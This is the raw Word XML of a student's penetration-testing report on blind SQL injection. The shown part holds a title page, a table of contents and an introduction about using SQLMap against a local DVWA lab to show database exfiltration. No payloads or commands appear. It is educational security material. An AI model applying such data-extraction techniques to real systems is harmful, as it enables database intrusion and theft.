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66F8" w:rsidRPr="00454180" w:rsidRDefault="0046636F" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>Web Penetration Testing Project Report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F366F8" w:rsidRPr="00454180" w:rsidRDefault="0046636F" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="1533525" cy="1524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3525" cy="1524000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F366F8" w:rsidRPr="00454180" w:rsidRDefault="0046636F" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F366F8" w:rsidRPr="00454180" w:rsidRDefault="0046636F" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora Medium" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora SemiBold" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Project-Title:</w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora Medium" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00454180" w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora Medium" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Blind SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F366F8" w:rsidRPr="00454180" w:rsidRDefault="0046636F" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2880" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Submitted By</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F366F8" w:rsidRPr="00454180" w:rsidRDefault="0046636F" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">               Name:</w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A4E31" w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">K Mohan </w:t>
      </w:r>
      <w:r w:rsidR="008463AE" w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="002A4E31" w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">atya </w:t>
      </w:r>
      <w:r w:rsidR="008463AE" w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="002A4E31" w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>enkat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F366F8" w:rsidRPr="00454180" w:rsidRDefault="0046636F" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">               Roll No: AP221100107</w:t>
      </w:r>
      <w:r w:rsidR="002A4E31" w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>45</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F366F8" w:rsidRPr="00454180" w:rsidRDefault="0046636F" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">                                 Section: CSE Y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F366F8" w:rsidRPr="00454180" w:rsidRDefault="0046636F" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F366F8" w:rsidRPr="00454180" w:rsidRDefault="0046636F" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Submitted To                                   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F366F8" w:rsidRPr="00454180" w:rsidRDefault="0046636F" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Bhaskara</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> Santhosh </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Egala</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00F366F8" w:rsidRPr="00454180" w:rsidRDefault="0046636F" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Assistant Professor SRM University AP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F366F8" w:rsidRPr="00454180" w:rsidRDefault="0046636F" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>CSE Department</w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-1296749346"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en" w:eastAsia="en-IN"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="00AB3FC2" w:rsidRPr="00AB3FC2" w:rsidRDefault="00AB3FC2">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rFonts w:cstheme="majorHAnsi"/>
              <w:sz w:val="48"/>
              <w:szCs w:val="48"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00AB3FC2">
            <w:rPr>
              <w:rFonts w:cstheme="majorHAnsi"/>
              <w:sz w:val="48"/>
              <w:szCs w:val="48"/>
            </w:rPr>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00AB3FC2" w:rsidRPr="00AB3FC2" w:rsidRDefault="00AB3FC2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00AB3FC2">
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00AB3FC2">
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00AB3FC2">
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc195990378" w:history="1">
            <w:r w:rsidRPr="00AB3FC2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>Introduction</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_Toc195990378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2</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79" w:history="1">
            <w:r w:rsidRPr="00AB3FC2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>Objective of the Project</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_Toc195990379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2</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0" w:history="1">
            <w:r w:rsidRPr="00AB3FC2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>Importance of Database Security</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_Toc195990380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3</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1" w:history="1">
            <w:r w:rsidRPr="00AB3FC2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>Understanding SQL Injection</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_Toc195990381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3</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2" w:history="1">
            <w:r w:rsidRPr="00AB3FC2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>Tools and Technologies Used</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_Toc195990382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4</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3" w:history="1">
            <w:r w:rsidRPr="00AB3FC2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>About SQLMap</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_Toc195990383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5</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4" w:history="1">
            <w:r w:rsidRPr="00AB3FC2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>Brief Description of the Project</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_Toc195990384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5</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5" w:history="1">
            <w:r w:rsidRPr="00AB3FC2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>Demonstration and Implementation</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_Toc195990385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7</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6" w:history="1">
            <w:r w:rsidRPr="00AB3FC2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>Screen Shots:</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_Toc195990386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9</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7" w:history="1">
            <w:r w:rsidRPr="00AB3FC2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>Alternative ways:</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_Toc195990387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13</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB3FC2">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:webHidden/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00AB3FC2" w:rsidRPr="00AB3FC2" w:rsidRDefault="00AB3FC2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
              <w:lang w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc195990388" w:history="1">
            <w:r w:rsidRPr="00AB3FC2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>Mitigation Techniques</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB3FC2">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:webHidden/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AB3FC2">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:webHidden/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00AB3FC2">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:webHidden/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc195990388 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00AB3FC2">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:webHidden/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00AB3FC2">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:webHidden/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00AB3FC2">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:webHidden/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB3FC2">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:webHidden/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00AB3FC2" w:rsidRDefault="00AB3FC2">
          <w:r w:rsidRPr="00AB3FC2">
            <w:rPr>
              <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00F366F8" w:rsidRPr="00454180" w:rsidRDefault="004A6E38" w:rsidP="004A6E38">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Lora" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:br w:type="page"/>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0" w:name="_Toc195990378"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="00D9326A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>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In today's digital era, data is one of the most valuable resources for organizations and individuals alike. Whether it's personal information, financial records, healthcare data, or confidential business details — it is essential to ensure this data is properly secured. Unfortunately, many web applications fail to implement proper security measures, making them vulnerable to attacks. Among the various types of web application vulnerabilities, SQL Injection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remains one of the most dangerous and prevalent.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00602FA4" w:rsidRDefault="00EB1BEB" w:rsidP="00602FA4">
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>This project focuses on identifying and exploiting SQL injection vulnerabilities using SQLMap, an automated SQL injection tool, on a locally hosted DVWA (Damn Vulnerable Web Application). The aim is to understand the practical implications of a SQL injection attack and demonstrate how attackers can exfiltrate sensitive information from a vulnerable database system using tools that are freely available. It further emphasizes the need for robust input validation and secure coding practices in modern application development</w:t>
      </w:r>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>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1" w:name="_Toc195990379"/>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Objective of the Project</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
